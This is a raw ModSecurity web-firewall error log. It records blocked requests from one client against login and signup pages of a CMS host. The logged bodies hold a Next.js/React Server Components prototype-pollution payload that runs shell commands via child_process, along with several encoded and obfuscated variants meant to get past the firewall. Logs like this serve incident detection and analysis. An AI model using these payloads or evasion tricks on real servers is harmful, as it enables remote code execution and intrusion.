{\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmy5c83uMXRUE9zvQS2gAAAcg"] [Sun Apr 05 15:42:35.959995 2026] [:error] [pid 1503:tid 1510] [client 172.94.9.253:42324] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmy0I7AjfUQYCN-J7DkAAAAME"] [Sun Apr 05 15:42:35.960559 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:42344] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmy7xQSOrq_iRTM7dpngAAAQ0"] [Sun Apr 05 15:42:35.960653 2026] [:error] [pid 23077:tid 23102] [client 172.94.9.253:42352] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmy5c83uMXRUE9zvQS2wAAAdM"] [Sun Apr 05 15:42:35.960727 2026] [:error] [pid 23077:tid 23084] [client 172.94.9.253:42292] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmy5c83uMXRUE9zvQS3AAAAcE"] [Sun Apr 05 15:42:35.960913 2026] [:error] [pid 1503:tid 1513] [client 172.94.9.253:42378] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmy0I7AjfUQYCN-J7DkQAAAMQ"] [Sun Apr 05 15:42:35.961336 2026] [:error] [pid 1309:tid 1382] [client 172.94.9.253:42336] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmyz-XKUNJEHmNu6G7vAAAAIs"] [Sun Apr 05 15:42:35.961583 2026] [:error] [pid 1503:tid 1519] [client 172.94.9.253:42340] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmy0I7AjfUQYCN-J7DkgAAAMo"] [Sun Apr 05 15:42:36.080762 2026] [:error] [pid 1503:tid 1505] [client 172.94.9.253:42458] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmzEI7AjfUQYCN-J7DlAAAAMA"] [Sun Apr 05 15:42:36.080997 2026] [:error] [pid 23077:tid 23103] [client 172.94.9.253:42424] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmzJc83uMXRUE9zvQS3gAAAdQ"] [Sun Apr 05 15:42:36.081569 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:42452] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmzJc83uMXRUE9zvQS4AAAAcY"] [Sun Apr 05 15:42:36.081589 2026] [:error] [pid 23077:tid 23094] [client 172.94.9.253:42422] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmzJc83uMXRUE9zvQS3wAAAcs"] [Sun Apr 05 15:42:36.081817 2026] [:error] [pid 1503:tid 1532] [client 172.94.9.253:42414] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmzEI7AjfUQYCN-J7DlQAAANQ"] [Sun Apr 05 15:42:36.081987 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:42394] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzLxQSOrq_iRTM7dpnwAAAQs"] [Sun Apr 05 15:42:36.083385 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:42448] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmzLxQSOrq_iRTM7dpoAAAAQI"] [Sun Apr 05 15:42:36.083530 2026] [:error] [pid 23077:tid 23093] [client 172.94.9.253:42438] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmzJc83uMXRUE9zvQS4QAAAco"] [Sun Apr 05 15:42:36.094500 2026] [:error] [pid 23077:tid 23107] [client 172.94.9.253:42470] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmzJc83uMXRUE9zvQS4gAAAdg"] [Sun Apr 05 15:42:36.094606 2026] [:error] [pid 1503:tid 1522] [client 172.94.9.253:42404] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmzEI7AjfUQYCN-J7DlgAAAM0"] [Sun Apr 05 15:42:36.162543 2026] [:error] [pid 31198:tid 31253] [client 172.94.9.253:42496] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzDT5TgrBR8xRnfXA8QAAAUE"] [Sun Apr 05 15:42:36.167542 2026] [:error] [pid 1503:tid 1533] [client 172.94.9.253:42504] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmzEI7AjfUQYCN-J7DmQAAANU"] [Sun Apr 05 15:42:36.167609 2026] [:error] [pid 22788:tid 22810] [client 172.94.9.253:42498] [client 172.94.9.253] ModSecurity: Access denied with code 403 